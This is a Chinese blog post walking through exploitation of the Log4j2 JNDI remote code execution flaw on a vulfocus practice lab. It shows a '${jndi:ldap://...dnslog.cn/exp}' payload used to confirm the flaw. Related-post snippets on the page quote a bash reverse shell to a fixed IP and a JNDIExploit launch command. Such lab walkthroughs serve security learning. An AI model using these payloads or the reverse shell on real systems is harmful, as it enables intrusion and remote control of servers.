用vulfocus靶场环境复现Log4j2远程命令执行漏洞

最新推荐文章于 2024-05-11 05:32:11 发布
最新推荐文章于 2024-05-11 05:32:11 发布
阅读量2.9k 收藏 2
点赞数 1
分类专栏: 软件安全(PWN) 文章标签: 安全 web安全 java log4j2 远程命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Onlyone_1314/article/details/122332384
版权

声明:文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

用vulfocus启动一个靶场环境,Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。
在这里插入图片描述

提示当前环境测试url:http://xxxxx/hello post参数为:payload=xxxxx
访问:http://vulfocus.fofa.so:35273/
在这里插入图片描述

扫描后台发现/error、/index.php、/hello
分别访问:
http://vulfocus.fofa.so:35273/error
在这里插入图片描述

http://vulfocus.fofa.so:35273/index.php
在这里插入图片描述

http://vulfocus.fofa.so:35273/hello
在这里插入图片描述

提示:不支持请求方法“GET”

我们可以用burpsuite或者火狐浏览器拦截编辑发送的数据包,这里我们只是简单利用就直接用火狐浏览器演示一下:
在这里插入图片描述

将数据提交方式改为POST,在请求主体中随便写点内容
在这里插入图片描述

发送:
在这里插入图片描述
在这里插入图片描述

返回OK提示我们能够成功发送数据包
再编辑重发,注意要加一个Content-Type: application/x-www-form-urlencoded:
构造payload="${jndi:ldap://987r84.dnslog.cn/exp}"
在这里插入图片描述

之后查看http://www.dnslog.cn/的987r84.dnslog.cn:
在这里插入图片描述

有对应的攻击记录,证明存在漏洞。
也可以在本地搭建运行JNDI服务,实现远程任意命令执行。

文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。

大灬白
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过vulfocus靶场--复现log4j2漏洞
weixin_55843787的博客
05-11 3396
vulfocus靶场log4j2漏洞复现
log4j2漏洞原理分析及复现-CVE-2021-44228 (vulfocus靶场
yang1234567898的博客
04-18 3188
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
vulfocus复现Log4j2远程命令执行2
woai_zhongguo的博客
07-15 724
Log4j2远程命令执行2复现过程
2024年最全分析Apache Log4j2 远程代码执行漏洞_log4j2漏洞2,2024年最新2024年冲刺年薪40w
最新发布
2401_84544363的博客
05-11 800
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Vulfocus漏洞复现log4j2-cve-2021-44228
weixin_45632448的博客
04-13 3945
vps:centos8 腾讯云 本地:windows11 靶场环境:http://123.58.236.76:64936/ 访问靶场环境http://123.58.236.76:64936/ 点击??? burp抓包,DNSlog验证漏洞是否存在 构造payload=${jndi:ldap://7272sq.ceye.io},并在burp中请求数据,返回400 payload=${jndi:ldap://7272sq.ceye.io} 对payload进行url编码(burp自带),再次进行请求,
(2022年12月最新)最详细vulfocus靶场 Log4j2远程命令执行漏洞复现
qq1140037586的博客
12-15 1042
1、向目标发送指定payload,目标对payload进行解析执行,然后会通过ldap链接远程服务,当ldap服务收到请求之后,将请求进行重定向到恶意 java class的地址。 2、目标服务器收到重定向请求之后,下载恶意class并执行其中的代码,从而执行系统命令
vulfocus.fofa靶场Log4j2远程命令执行2
weixin_48817799的博客
12-29 4970
vulfocus.fofa靶场Log4j2远程命令执行2前言一、靶场复现总结 前言 名称: ghcr.io/christophetd/log4shell-vulnerable-app:latest 描述: log4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 一、靶场复现 工具:JNDIExploit-1.3-SNAPSHOT.jar 1.打开靶场http://vulfocus.fofa.so 2.使用vps启动工具 java -jar JNDIExploit-1.3.
log4j漏洞靶场docker-compose.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
log4j2-rce靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
Docker简单搭建Vulfocus靶场 CN-SEC 中文网.pdf
02-07
* 漏洞靶场环境Vulfocus提供了大量的漏洞靶场环境,包括Web应用程序漏洞、系统漏洞、网络协议漏洞等。 * 漏洞信息库:Vulfocus平台提供了一个漏洞信息库,包括CVE编号、漏洞描述、漏洞分类等信息。 * 漏洞扫描工具...
Log4j2远程命令执行2-vulfocus-wp
miojjnum的博客
12-22 3678
vulfocuslog4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 1、首先准备一个vps环境(腾讯云阿里云都可) 在vps上开启ldap环境: 输入命令开启监听: java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 你的vps的IP地址 -l 7000 -p 5000 2、bp抓包伺候 ...
vulfocus-fofa靶场 Log4j2远程命令执行
weixin_48817799的博客
12-29 4278
Log4j2远程命令执行前言一、Apache Log4j2是什么?二、复现步骤1.工具2.复现过程 前言 一、Apache Log4j2是什么? Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 二、复现步骤 1.工具 工具:JNDI-Inje
CVE-2021-44228——Log4j2-RCE漏洞复现
「 虚幻私塾」
01-20 640
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 0x00 漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3
Apache Log4j2 远程代码执行
qq_43679531的博客
01-21 3180
iptables -I INPUT -p tcp --dport 9999 -j ACCEPT iptables -I INPUT -p tcp --dport 1099 -j ACCEPT iptables -I INPUT -p tcp --dport 8180 -j ACCEPT iptables -I INPUT -p tcp --dport 1389 -j ACCEPT 工具 链接:百度网盘 请输入提取码 提取码:6ldj java -jar JNDI-Injectio..
Apache Log4j2 Vulfocus靶场环境复现
Aevery的博客
12-12 3545
Vulfocus在线靶场免费注册免费使用。在线地址: vulfocus 点击启动环境 启动后访问页面显示地地址,能成功访问即完成搭建完成 这里使用chrome的HackBar插件,直接使用POST协议随便传个参数上去访问hello页面 直接在Body插入payload,这里使用dnslog payload="${jndi:ldap://asr17t.dnslog.cn/exp}" 成功打印出dnslog信息 反弹shell替换payload即可 PS:...
分析Apache Log4j2 远程代码执行漏洞_log4j2漏洞2,统统给你解决
2401_83740189的博客
04-14 1062
外链图片转存中…(img-cGAmpnxA-1713052951399)][外链图片转存中…(img-tAkhHIAg-1713052951400)][外链图片转存中…(img-JbocLAWd-1713052951400)][外链图片转存中…(img-Tu3mJCi3-1713052951401)][外链图片转存中…(img-pAA8Ejf2-1713052951401)][外链图片转存中…(img-cMAOKTbL-1713052951401)]
Log4j2远程命令执行复现
qq_18811919的博客
04-04 531
本篇文章讲解了Log4j2的常见利用手法,该漏洞影响的范围非常大在护网中经常会使用重大漏洞Get WebShell后续攻击内网横向移动拿到靶标,后续我会推出李同学红队仿真靶场尽可能的还原护网场景感兴趣的朋友关注下。
log4j漏洞复现vulhub靶场
08-14
3. 进入 log4j 漏洞环境目录:执行以下命令进入 log4j 漏洞环境的目录: ``` $ cd log4shell/CVE-2021-44228 ``` 4. 启动容器:执行以下命令启动容器,将漏洞环境运行起来: ``` $ docker-compose up -d ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值